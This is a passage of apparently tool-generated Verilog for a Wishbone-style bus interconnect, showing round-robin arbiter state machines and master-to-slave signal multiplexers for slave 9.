                    if ( s9_msel_arb2_req[6] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[7] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[0] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[1] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[2] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[3] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant5:
        begin
            if (  !( s9_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[6] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[7] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[0] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[1] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[2] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[3] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[4] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant6:
        begin
            if (  !( s9_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[7] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[0] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[1] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[2] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[3] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[4] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[5] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb2_grant7:
        begin
            if (  !( s9_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s9_msel_arb2_req[0] ) 
                begin
                    s9_msel_arb2_next_state = s9_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s9_msel_arb2_req[1] ) 
                    begin
                        s9_msel_arb2_next_state = s9_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s9_msel_arb2_req[2] ) 
                        begin
                            s9_msel_arb2_next_state = s9_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s9_msel_arb2_req[3] ) 
                            begin
                                s9_msel_arb2_next_state = s9_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s9_msel_arb2_req[4] ) 
                                begin
                                    s9_msel_arb2_next_state = s9_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb2_req[5] ) 
                                    begin
                                        s9_msel_arb2_next_state = s9_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb2_req[6] ) 
                                        begin
                                            s9_msel_arb2_next_state = s9_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s9_msel_arb3_req = { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd3 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd3 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd3 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd3 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd3 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd3 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd3 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s9_msel_arb3_state <= s9_msel_arb3_grant0;
        end
        else
        begin 
            s9_msel_arb3_state <= s9_msel_arb3_next_state;
        end
    end
    always @ (  s9_msel_arb3_state or  { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd3 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd3 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd3 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd3 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd3 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd3 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd3 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s9_msel_arb3_next_state = s9_msel_arb3_state;
        case ( s9_msel_arb3_state ) 
        s9_msel_arb3_grant0:
        begin
            if (  !( s9_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[1] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[2] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[3] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[4] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[5] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[6] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[7] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant1:
        begin
            if (  !( s9_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[2] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[3] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[4] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[5] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[6] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[7] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[0] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant2:
        begin
            if (  !( s9_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[3] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[4] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[5] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[6] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[7] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[0] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[1] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant3:
        begin
            if (  !( s9_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[4] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[5] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[6] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[7] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[0] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[1] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[2] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant4:
        begin
            if (  !( s9_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[5] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[6] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[7] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[0] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[1] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[2] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[3] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant5:
        begin
            if (  !( s9_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[6] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[7] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[0] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[1] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[2] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[3] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[4] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant6:
        begin
            if (  !( s9_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[7] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[0] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[1] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[2] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[3] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[4] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[5] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb3_grant7:
        begin
            if (  !( s9_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s9_msel_arb3_req[0] ) 
                begin
                    s9_msel_arb3_next_state = s9_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s9_msel_arb3_req[1] ) 
                    begin
                        s9_msel_arb3_next_state = s9_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s9_msel_arb3_req[2] ) 
                        begin
                            s9_msel_arb3_next_state = s9_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s9_msel_arb3_req[3] ) 
                            begin
                                s9_msel_arb3_next_state = s9_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s9_msel_arb3_req[4] ) 
                                begin
                                    s9_msel_arb3_next_state = s9_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb3_req[5] ) 
                                    begin
                                        s9_msel_arb3_next_state = s9_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb3_req[6] ) 
                                        begin
                                            s9_msel_arb3_next_state = s9_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s9_msel_pri_out or  s9_msel_arb0_state or  s9_msel_arb1_state)
    begin
        if ( s9_msel_pri_out[0] ) 
        begin
            s9_msel_sel1 = s9_msel_arb1_state;
        end
        else
        begin 
            s9_msel_sel1 = s9_msel_arb0_state;
        end
    end
    always @ (  s9_msel_pri_out or  s9_msel_arb0_state or  s9_msel_arb1_state or  s9_msel_arb2_state or  s9_msel_arb3_state)
    begin
        case ( s9_msel_pri_out ) 
        2'd0:
        begin
            s9_msel_sel2 = s9_msel_arb0_state;
        end
        2'd1:
        begin
            s9_msel_sel2 = s9_msel_arb1_state;
        end
        2'd2:
        begin
            s9_msel_sel2 = s9_msel_arb2_state;
        end
        2'd3:
        begin
            s9_msel_sel2 = s9_msel_arb3_state;
        end
        endcase
    end
    assign s9_mast_sel = ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s9_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s9_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s9_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s9_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s9_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s9_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s9_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s9_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s9_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s9_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s9_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s9_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s9_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s9_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s9_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s9_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s9_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s9_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s9_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s9_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s9_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s9_m0_data_o = s9_data_i;
    assign s9_m1_data_o = s9_data_i;
    assign s9_m2_data_o = s9_data_i;
    assign s9_m3_data_o = s9_data_i;
    assign s9_m4_data_o = s9_data_i;
    assign s9_m5_data_o = s9_data_i;
    assign s9_m6_data_o = s9_data_i;
    assign s9_m7_data_o = s9_data_i;
    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s9_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s9_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s9_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s9_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s9_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s9_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s9_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s9_m0_cyc_r <= m0_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m1_cyc_r <= m1_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m2_cyc_r <= m2_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m3_cyc_r <= m3_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m4_cyc_r <= m4_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m5_cyc_r <= m5_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m6_cyc_r <= m6_s9_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s9_m7_cyc_r <= m7_s9_cyc_o;
    end
    always @ (  ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) or  m0_s9_cyc_o or  m1_s9_cyc_o or  m2_s9_cyc_o or  m3_s9_cyc_o or  m4_s9_cyc_o or  m5_s9_cyc_o or  m6_s9_cyc_o or  m7_s9_cyc_o or  s9_m0_cyc_r or  s9_m1_cyc_r or  s9_m2_cyc_r or  s9_m3_cyc_r or  s9_m4_cyc_r or  s9_m5_cyc_r or  s9_m6_cyc_r or  s9_m7_cyc_r)
    begin
        case ( ( ( ( s9_pri_sel == 2'd0 ) ) ? ( s9_arb_state ) : ( ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( s9_msel_arb0_state ) : ( ( ( ( s9_msel_pri_sel == 2'd1 ) ) ? ( s9_msel_sel1 ) : ( s9_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s9_wb_cyc_o = ( m0_s9_cyc_o & s9_m0_cyc_r );
        end
        3'd1:
        begin
            s9_wb_cyc_o = ( m1_s9_cyc_o & s9_m1_cyc_r );
        end
        3'd2:
        begin
            s9_wb_cyc_o = ( m2_s9_cyc_o & s9_m2_cyc_r );
        end
        3'd3:
        begin
            s9_wb_cyc_o = ( m3_s9_cyc_o & s9_m3_cyc_r );
        end
        3'd4:
        begin
            s9_wb_cyc_o = ( m4_s9_cyc_o & s9_m4_cyc_r );
        end
        3'd5:
        begin
            s9_wb_cyc_o = ( m5_s9_cyc_o & s9_m5_cyc_r );
        end
        3'd6:
        begin
            s9_wb_cyc_o = ( m6_s9_cyc_o & s9_m6_cyc_r );
        end
        3'd7:
        begin
            s9_wb_cyc_o = ( m7_s9_cyc_o & s9_m7_cyc_r );
        end
        endcase
    end
